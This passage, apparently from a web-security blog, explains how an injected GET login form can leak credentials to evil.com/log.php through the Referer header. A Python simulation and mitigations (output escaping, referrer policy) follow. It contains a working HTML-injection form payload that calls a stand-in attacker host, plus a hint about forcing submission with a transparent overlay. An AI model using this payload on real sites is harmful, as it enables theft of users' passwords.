And while their fix for the RCSR issue is good, it's not perfect.
Let's assume we have an HTML injection issue in a page called http://site.com/vuln.php in the GET parameter search, i.e. the value of search is reflected into the page unescaped, so http://site.com/vuln.php?search=<img src=http://evil.com/image.jpg> would inject an image into the page.
What we can then do is inject a form into the page which looks like this. Note that the form's action stays on site.com, so it is a login form for the site the user is actually on, and that it uses method="get", so whatever is typed into it ends up in the query string of the URL:
<form action="http://site.com/vuln.php" method="get">
<input type="text" name="username" />
<input type="password" name="password" />
<input type="hidden" name="search" value="<img src='http://evil.com/log.php' />" />
<input type="submit" value="Login" />
</form>
Then, if we get the user to submit the form, the browser requests http://site.com/vuln.php?username=...&password=...&search=..., vuln.php reflects the hidden search value, so the response now contains the <img> pointing at http://evil.com/log.php, and the Referer header the browser sends with that image request is the full URL of the page, username and password included. Everything that hits log.php can simply be read out of its Referer.
Of course, to get the form submitted without the user doing it deliberately, the real thing would use something like a transparent <input type="image"> that covers the whole browser window, so that any click submits the form. That problem has already been solved elsewhere, and I wanted to keep the example clean.
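To make the chain concrete, here is an added Python model of the whole exchange (example code written for this page, not from the original post and not from any browser or PHP source). site.com, vuln.php and evil.com/log.php are the post's hypothetical names; alice and hunter2 are constructed sample credentials. The referer_under_policy helper is also an addition, there to show the caveat that matters today: current browsers default to the strict-origin-when-cross-origin referrer policy, which sends only the origin on the cross-origin image request, so the query string, and with it the credentials, never reach log.php unless the page opts into a laxer policy. Run it as-is or call run_attack() with your own values.

```python
"""Model of the Referer leak via an injected GET form (example code, not from the post).

Hypothetical names from the post: site.com, vuln.php, evil.com/log.php.
Constructed sample credentials: alice / hunter2.
"""
from urllib.parse import urlsplit, urlencode, parse_qs, quote

# The form injected through the reflected `search` parameter (constructed, same as in the post).
INJECTED_FORM = (
    '<form action="http://site.com/vuln.php" method="get">'
    '<input type="text" name="username" />'
    '<input type="password" name="password" />'
    '<input type="hidden" name="search" value="<img src=\'http://evil.com/log.php\' />" />'
    '<input type="submit" value="Login" />'
    '</form>'
)


def injection_url(base="http://site.com/vuln.php", param="search", payload=INJECTED_FORM):
    """URL the victim must visit: the form URL-encoded into the reflected parameter."""
    return f"{base}?{param}={quote(payload, safe='')}"


def browser_get_submit(action, fields):
    """URL a browser requests when it submits a method=get form: every field becomes a query parameter."""
    return f"{action}?{urlencode(fields)}"


def render_vuln_page(request_url):
    """Model of vuln.php: echoes `search` into the page without escaping (that is the bug)."""
    qs = parse_qs(urlsplit(request_url).query, keep_blank_values=True)
    return f"<html><body>Results for: {qs.get('search', [''])[0]}</body></html>"


def referer_under_policy(page_url, policy, cross_origin=True):
    """Referer a browser sends for a subresource of page_url under the given Referrer-Policy.
    Only the policies relevant here are modelled; all URLs are http, so https->http downgrade is ignored."""
    parts = urlsplit(page_url)
    origin = f"{parts.scheme}://{parts.netloc}/"
    if policy == "no-referrer":
        return None
    if policy in ("origin", "strict-origin"):
        return origin
    if policy in ("origin-when-cross-origin", "strict-origin-when-cross-origin"):
        return origin if cross_origin else page_url
    if policy == "same-origin":
        return None if cross_origin else page_url
    if policy in ("no-referrer-when-downgrade", "unsafe-url"):
        return page_url
    raise ValueError(f"unknown policy {policy!r}")


def credentials_from_referer(referer):
    """What log.php does: pull username/password out of the Referer's query string, if present."""
    if not referer:
        return None
    qs = parse_qs(urlsplit(referer).query, keep_blank_values=True)
    if "username" in qs and "password" in qs:
        return qs["username"][0], qs["password"][0]
    return None


def run_attack(username="alice", password="hunter2", policy="no-referrer-when-downgrade"):
    """End to end: victim submits the injected form, vuln.php reflects the <img>, log.php reads the Referer.
    The default policy is the historical browser behaviour (full URL on every http request)."""
    # 1. Submitting the injected form puts the credentials into the URL of vuln.php.
    submit_url = browser_get_submit("http://site.com/vuln.php", {
        "username": username,
        "password": password,
        "search": "<img src='http://evil.com/log.php' />",
    })
    # 2. vuln.php reflects the hidden field, so the response embeds our image.
    page = render_vuln_page(submit_url)
    if "<img src='http://evil.com/log.php' />" not in page:
        raise RuntimeError("reflection failed; the attack depends on unescaped output")
    # 3. The browser fetches log.php (cross-origin) and attaches the page URL as Referer, policy permitting.
    referer = referer_under_policy(submit_url, policy, cross_origin=True)
    return credentials_from_referer(referer)


if __name__ == "__main__":
    print("victim visits:", injection_url())
    print("log.php sees (old default):", run_attack())
    print("log.php sees (modern default):", run_attack(policy="strict-origin-when-cross-origin"))
```

The model makes the two preconditions explicit: the reflection in vuln.php must be unescaped (render_vuln_page raises otherwise), and the browser must send full URLs cross-origin. Escaping the search parameter on output, or serving vuln.php with a Referrer-Policy that trims cross-origin referrers, each breaks the chain on its own.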